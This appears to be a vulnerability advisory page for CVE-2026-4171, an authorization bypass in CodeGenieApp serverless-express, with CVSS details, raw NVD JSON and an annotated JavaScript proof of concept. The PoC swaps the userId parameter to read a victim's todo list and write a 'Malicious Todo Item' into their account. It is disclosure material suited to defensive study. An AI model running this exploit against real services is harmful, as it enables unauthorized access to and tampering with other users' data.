Security Vulnerability Report
CVE-2026-4171 CVSS 6.3 MEDIUM

CVE-2026-4171

Published: 2026-03-16 14:19:57
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in CodeGenieApp serverless-express up to 4.17.1. Affected by this issue is some unknown functionality of the file examples/lambda-function-url/packages/api/models/TodoList.ts of the component API Endpoint. The manipulation of the argument userId leads to authorization bypass. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

CodeGenieApp serverless-express <= 4.17.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-4171 PoC - Authorization Bypass via userId Parameter Manipulation
// Target: CodeGenieApp serverless-express API Endpoint
//
// Reviewer notes (defensive reading of this listing):
// - Per the report's description and weakness list (CWE-285 / CWE-639), the
//   endpoint honours a caller-supplied `userId` instead of the identity bound
//   to the presented bearer token. The server-side fix is to derive the owner
//   from the authenticated principal and ignore, or reject with 403, a
//   client-supplied userId that differs from it.
// - `axios` is a third-party package, not part of Node's standard library;
//   the listing was published collapsed onto two lines and has been re-broken
//   here, with no token changed.
// - TARGET_URL, ATTACKER_TOKEN and VICTIM_USER_ID are the placeholder values
//   from the published report.
const axios = require('axios');
// Configuration
const TARGET_URL = 'https://target-server.com/api/todolist';
const ATTACKER_TOKEN = 'attacker_low_privilege_token';
const VICTIM_USER_ID = 'victim_user_id_123';

// Read path. Returns true when the request carrying a foreign userId
// resolves without throwing, false otherwise. Only the HTTP status and the
// response body are logged; no check is made on whose records came back.
async function exploitAuthorizationBypass() {
  console.log('[+] CVE-2026-4171 Authorization Bypass Exploit');
  console.log('[+] Target:', TARGET_URL);
  // Step 1: Normal request with attacker's own userId
  // Baseline call: same token, the caller's own userId. Result is logged and
  // otherwise unused; it does not gate Step 2.
  console.log('\n[*] Step 1: Testing with attacker userId...');
  try {
    const normalResponse = await axios.get(`${TARGET_URL}`, {
      headers: { 'Authorization': `Bearer ${ATTACKER_TOKEN}`, 'Content-Type': 'application/json' },
      params: { userId: 'attacker_own_user_id' }
    });
    console.log('[+] Normal request successful:', normalResponse.status);
  } catch (error) {
    console.log('[-] Normal request failed:', error.message);
  }
  // Step 2: Exploit - Bypass authorization by manipulating userId
  // NOTE(review): "success" below means only that axios did not reject. A
  // patched server that scopes the query by the token-bound user would also
  // answer 2xx (with the caller's own data), so a 2xx alone does not
  // distinguish fixed from vulnerable; confirming a fix means checking that
  // the returned records are not the victim's. axios rejects non-2xx
  // responses by default, so a 403/404 from a patched server lands in the
  // catch branch and is reported as a failure.
  console.log('\n[*] Step 2: Exploiting authorization bypass with victim userId...');
  try {
    const exploitResponse = await axios.get(`${TARGET_URL}`, {
      headers: { 'Authorization': `Bearer ${ATTACKER_TOKEN}`, 'Content-Type': 'application/json' },
      params: {
        userId: VICTIM_USER_ID // Manipulating userId to access victim's data
      }
    });
    console.log('[+] Exploit successful - Accessed victim data!');
    console.log('[+] Response status:', exploitResponse.status);
    console.log('[+] Response data:', JSON.stringify(exploitResponse.data, null, 2));
    return true;
  } catch (error) {
    console.log('[-] Exploit failed:', error.message);
    return false;
  }
}

// POST request exploitation
// Write path of the same defect: `userId` travels in the JSON body rather
// than the query string. Defensively, the handler should overwrite or reject
// any body-supplied userId using the identity from the validated token; an
// audit log keyed on token identity vs. requested userId would surface this
// mismatch. Returns nothing; outcome is only logged.
async function exploitWriteOperations() {
  console.log('\n[*] Step 3: Testing write operations on victim account...');
  try {
    const writeResponse = await axios.post(`${TARGET_URL}`, {
      userId: VICTIM_USER_ID,
      data: { title: 'Malicious Todo Item', description: 'Added via authorization bypass' }
    }, {
      headers: { 'Authorization': `Bearer ${ATTACKER_TOKEN}`, 'Content-Type': 'application/json' }
    });
    console.log('[+] Write operation successful!');
    console.log('[+] Response:', JSON.stringify(writeResponse.data, null, 2));
  } catch (error) {
    console.log('[-] Write operation failed:', error.message);
  }
}

// Execute exploit
// Entry point: the write test runs only when the read test returned true.
// Each awaited call handles its own errors, so this IIFE has no rejection
// path of its own beyond console output.
(async () => {
  const success = await exploitAuthorizationBypass();
  if (success) {
    await exploitWriteOperations();
  }
  console.log('\n[!] Exploit completed');
})();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4171", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:57.123", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in CodeGenieApp serverless-express up to 4.17.1. Affected by this issue is some unknown functionality of the file examples/lambda-function-url/packages/api/models/TodoList.ts of the component API Endpoint. The manipulation of the argument userId leads to authorization bypass. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en CodeGenieApp serverless-express hasta la versión 4.17.1. Afectada por este problema está alguna funcionalidad desconocida del archivo examples/lambda-function-url/packages/api/models/TodoList.ts del componente API Endpoint. La manipulación del argumento userId conduce a una omisión de autorización. El ataque es posible de ser llevado a cabo de forma remota. El exploit ha sido divulgado públicamente y puede ser utilizado. 
El proveedor fue contactado con antelación sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", 
"confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/AnalogyC0de/public_exp/issues/20", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351078", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351078", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769769", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769771", "source": "[email protected]"}]}}